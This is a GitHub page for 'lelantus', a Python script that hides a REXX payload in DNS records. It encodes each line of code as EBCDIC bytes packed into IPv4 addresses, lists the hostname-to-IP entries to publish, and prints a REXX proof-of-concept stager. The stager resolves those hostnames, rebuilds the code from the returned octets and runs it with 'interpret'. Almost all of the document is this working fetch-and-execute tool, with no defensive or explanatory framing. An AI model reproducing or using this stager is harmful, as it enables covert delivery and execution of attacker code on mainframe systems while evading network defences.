-
Notifications
You must be signed in to change notification settings - Fork 0
/
lelantus
executable file
·138 lines (109 loc) · 3.43 KB
/
lelantus
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
#!/usr/bin/python
import socket
import sys, time
import struct
import argparse
header = '''
___ _______ ___ _______ __ _ _______ __ __ _______
| | | || | | _ || | | || || | | || |
| | | ___|| | | |_| || |_| ||_ _|| | | || _____|
| | | |___ | | | || | | | | |_| || |_____
| |___ | ___|| |___ | || _ | | | | ||_____ |
| || |___ | || _ || | | | | | | | _____| |
|_______||_______||_______||__| |__||_| |__| |___| |_______||_______|
Appearances are a glimpse of the unseen...
'''
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,description=header)
parser.add_argument("--realdns", help="Set if you want to use existing DNS entries (very alpha)", action='store_true')
parser.add_argument("-tld", help="TLD for generated dns-entries", required=True)
parser.add_argument('-infile', help="The REXX payload you want to store in DNS", required=True)
args = parser.parse_args()
with open(args.infile) as code_stream:
code = code_stream.read()
charval = {}
def char2oct(someChar):
'''Takes 1-byte character and returns
the EBCDIC integer value for it'''
ebcdicChar = someChar.encode('cp500')
intval = struct.unpack('<B',ebcdicChar)[0]
return intval
def b42ip(char4):
'''Takes a 4 byte string and returns
the dotted decimal ipv4 notation'''
a = char2oct(char4[0])
b = char2oct(char4[1])
c = char2oct(char4[2])
d = char2oct(char4[3])
return '%s.%s.%s.%s' % (a,b,c,d)
def gendsn(domain):
import random
import string
host = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(7))
return host + "." + domain
result = []
toadd = {}
hostfile = []
print header
extra = " Generating REXX and DNS"
print extra
total=len(code.split('\n'))
for loc in code.split('\n'):
line = []
done = 0
is4 = len(loc) % 4
while is4:
loc += " "
is4 = len(loc) % 4
ips = [loc[i:i+4] for i in range(0, len(loc), 4)]
for ip in ips:
o1 = char2oct(ip[0])
o2 = char2oct(ip[1])
o3 = char2oct(ip[2])
o4 = char2oct(ip[3])
theip = b42ip(ip)
if theip in toadd:
dns = toadd[theip]
line.append([dns, theip])
else:
if args.realdns:
try:
dns = socket.gethostbyaddr(theip)[0]
except:
dns = gendsn(args.tld)
else:
dns = gendsn(args.tld)
line.append([dns, theip])
toadd[theip] = dns
result.append(line)
print "Required DNS entries:"
for line in result:
for entry in line:
print "%s -> %s" % (entry[0], entry[1])
# Now generate the REXX
print "-------_YOUR_REXX_SCRIPT-----------"
print ""
print "/* REXX */"
print "/* Proof of Concept */"
for a in result:
print "cline = ''"
for char4 in a:
print "cline = cline || ip24b('"+char4[0]+"')"
print "interpret cline"
print "exit 0"
print '''
ip24b: procedure
parse arg dns
res = ""
src = socket("INITIALIZE","MYSET01");
a = socket("GETHOSTBYNAME", dns)
parse var a RC STUFF
if RC = "0" then do;
parse var STUFF oct1 "." oct2 "." oct3 "." oct4
res = res ||d2c(oct1)
res = res ||d2c(oct2)
res = res ||d2c(oct3)
res = res ||d2c(oct4)
end;
src = socket("TERMINATE","MYSET01");
return res
'''